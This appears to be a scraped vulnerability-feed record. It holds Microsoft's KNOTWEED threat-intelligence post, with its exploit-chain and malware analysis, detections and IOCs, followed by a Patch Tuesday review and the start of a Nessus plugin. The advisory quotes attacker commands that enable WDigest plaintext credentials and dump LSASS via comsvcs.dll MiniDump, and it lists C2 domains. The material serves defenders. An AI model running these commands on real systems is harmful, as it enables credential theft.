context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.\n\nCVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt's important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn\u2019t considered dangerous. Hence, these sandboxes aren\u2019t a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by \u2018DSIRF GmbH\u2019.\n\n![A screenshot of the digital signature details tab from the file properties page. The tab states that the digital signature for the file is OK. The name indicated under the signer information portion is DSIRF GmbH.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig1-Valid-digital-signature-from-DSIRF.png)Figure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig2a-Examples-of-KNOTWEED-macro-obfuscation.png) ![Two screenshots of macro code snippet, presenting different examples of how the macro is obfuscated to evade detection. In the first code snippet, text from the Kama Sutra is inserted among the macro code. The second code snippet presents the code of a function where the attacker uses Excel 4 macro for obfuscation.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig2b-Examples-of-KNOTWEED-macro-obfuscation.png)Figure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\n![A screenshot of a code snippet where the malware copies opcode to a newly allocated buffer.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig3-copying-opcodes.png)Figure 3: Copying opcodes ![A screenshot of a code snippet where the malware calls the CreateThread function to execute the shellcode.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig4-Calling-CreateThread.png)Figure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode's purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig5-Image-embedded-with-the-KNOTWEED-loader-shellcode-and-Corelump.png)Figure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump _is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile._ These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump _is responsible for loading _Corelump _into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both_ Jumplump _and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\n![A screenshot of assembly code presenting the jmp/instruction obfuscation used in Jumplump malware. ](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig6-Disassembly-showing-jmp-instructions.png)Figure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [PharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n \nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting of _UseLogonCredential _to \u201c1\u201d to enable plaintext credentials:\n * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempt to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED's attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.\n\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company's own website), and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump _drops the_ Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\\\. _This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., _HKLM\\SOFTWARE\\Classes\\CLSID\\\\{GUID}\\InProcServer32 Default_ value). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = "_%SystemRoot%\\System32\\ApplicationFrame.dll_"\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = "_%SystemRoot%\\system32\\propsys.dll_"\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = "_%SystemRoot%\\system32\\wbem\\wbemprox.dll_"\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = "_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_"\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = "_%SystemRoot%\\System32\\Actioncenter.dll_"\n\nMany of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, _and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature\u2014enabled by default\u2014is on if the Group Policy setting for Macro Run Time Scan Scope is set to \u201cEnable for All Files\u201d or \u201cEnable for Low Trust Files\u201d.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _Note:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware \n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware \nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| Passlib tool \nacrobatrelay[.]com__| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking _- Detects multiple behaviors, including _JumpLump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module _- Detects a possible privilege escalation behavior associated with CVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities\n * _KNOTWEED actor activity detected _- Detects KNOTWEED actor activities\n * _WDigest configuration change _- Detects potential retrieval of clear text password from changes to _UseLogonCredential_ registry key\n * _Sensitive credential memory read _- Detects LSASS credential dumping via minidumps\n * _Suspicious Curl behavior _- Detects the use of Curl to download KNOTWEED tooling from public file shares\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected ****credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from memory\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to ****plaintext credentials**\n\nThis query looks for registry key being set to enabled plain text credentials\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\ folder_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mssecure", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MSSECURE:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello everyone! Let's now talk about Microsoft Patch Tuesday vulnerabilities for the second quarter of 2021. April, May and June. Not the most exciting topic, I agree. I am surprised that someone is reading or watching this. For me personally, this is a kind of tradition. Plus this is an opportunity to try Vulristics in action and find possible problems. It is also interesting to see what VM vendors considered critical back then and what actually became critical. I will try to keep this video short.\n\nFirst of all, let's take a look at the vulnerabilities from the April Patch Tuesday. 108 vulnerabilities, 55 of them are RCEs. Half of these RCEs (27) are weird RPC vulnerabilities. "Researcher who reported these bugs certainly found quite the attack surface". The most critical vulnerability is RCE in Exchange (CVE-2021-28480). This is not ProxyLogon, this is another vulnerability. ProxyLogon was in March. And this vulnerability is simply related to ProxyLogon, so it is believed that it is exploited in the wild as well. In the second place this Win32k Elevation of Privilege (CVE-2021-28310). It is clearly mentioned in several sources as being used in real attacks. "Bugs of this nature are typically combined with other bugs, such as a browser bug or PDF exploit, to take over a system". And the only vulnerability with a public exploit is the Azure DevOps Server Spoofing (CVE-2021-28459). Previously known as Team Foundation Server (\u200bTFS), Azure DevOps Server is a set of collaborative software development tools. It is hosted on-premises. Therefore, this vulnerability can be useful for attackers.\n\nLet's take a look at May. A very small Patch Tuesday. There are only 55 vulnerabilities. Vendors mainly wrote about HTTP Protocol Stack Remote Code Execution Vulnerability. But no catastrophe happened. "tenable: On May 16, security researcher 0vercl0k published PoC code to github for CVE-2021-31166. Based on our analysis, this exploit could only result in a denial of service (DoS) condition". VM vendors also wrote a lot about Hyper-V Remote Code Execution Vulnerability. But there was no real exploitation there either. But a real exploit appeared for Remote Code Execution in Microsoft SharePoint (CVE-2021-31181). And exploitation in the wild was mentioned for Windows Container Manager Service (CVE-2021-31167), which no VM vendor mentioned at all. But the exploitation was "Personally observed in an environment", so this may not be accurate. Also take a look at Memory Corruption in Microsoft Scripting Engine (CVE-2021-26419) with a public exploit and Information Disclosure in Windows Wireless Networking (CVE-2020-24587) with a sign of exploitation in the wild (but this also may not be accurate).\n\nAnd finally June. There are even fewer vulnerabilities, only 49. But there are a lot of them with a sign of exploitation in the wild. And this information is directly from Microsoft. Windows MSHTML Platform Remote Code Execution (CVE-2021-33742). Elevations of Privilege in Windows NTFS (CVE-2021-31956), Microsoft Enhanced Cryptographic Provider (CVE-2021-31199, CVE-2021-31201), Microsoft DWM Core Library (CVE-2021-33739). Windows Kernel Information Disclosure (CVE-2021-31955). Much more than usual. VM vendors have written the most about EoP in Windows NTFS (CVE-2021-31956). Do you know what vulnerability they didn't highlight at all? Elevations of Privilege and later Remote Code Execution in Windows Print Spooler (CVE-2021-1675). The one that started the PrintNightmare story. Very ironic. Also pay attention to Spoofing in Microsoft SharePoint (CVE-2021-31950) for which there is a public Server-Side Request Forgery exploit. VM vendors also did not write anything about this vulnerability in their reviews.\n\nFull Vulristics reports:\n\n * [ms_patch_tuesday_april2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_may2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_may2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_june2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2021_report_avleonov_comments.html>)\n\n![](http://feeds.feedburner.com/~r/avleonov/~4/zKo35MmSBcA)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-10T00:14:59", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24587", "CVE-2021-1675", "CVE-2021-26419", "CVE-2021-28310", "CVE-2021-28459", "CVE-2021-28480", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31181", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31950", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-07-10T00:14:59", "id": "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "href": "http://feedproxy.google.com/~r/avleonov/~3/zKo35MmSBcA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-02-16T14:28:10", "description": "The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003694.NASL", "href": "https://www.tenable.com/plugins/nessus/150368", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150368);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003667\");\n script_xref(name:\"MSKB\", value:\"5003694\");\n script_xref(name:\"MSFT\", value:\"MS21-5003667\");\n script_xref(name:\"MSFT\", value:\"MS21-5003694\");\n 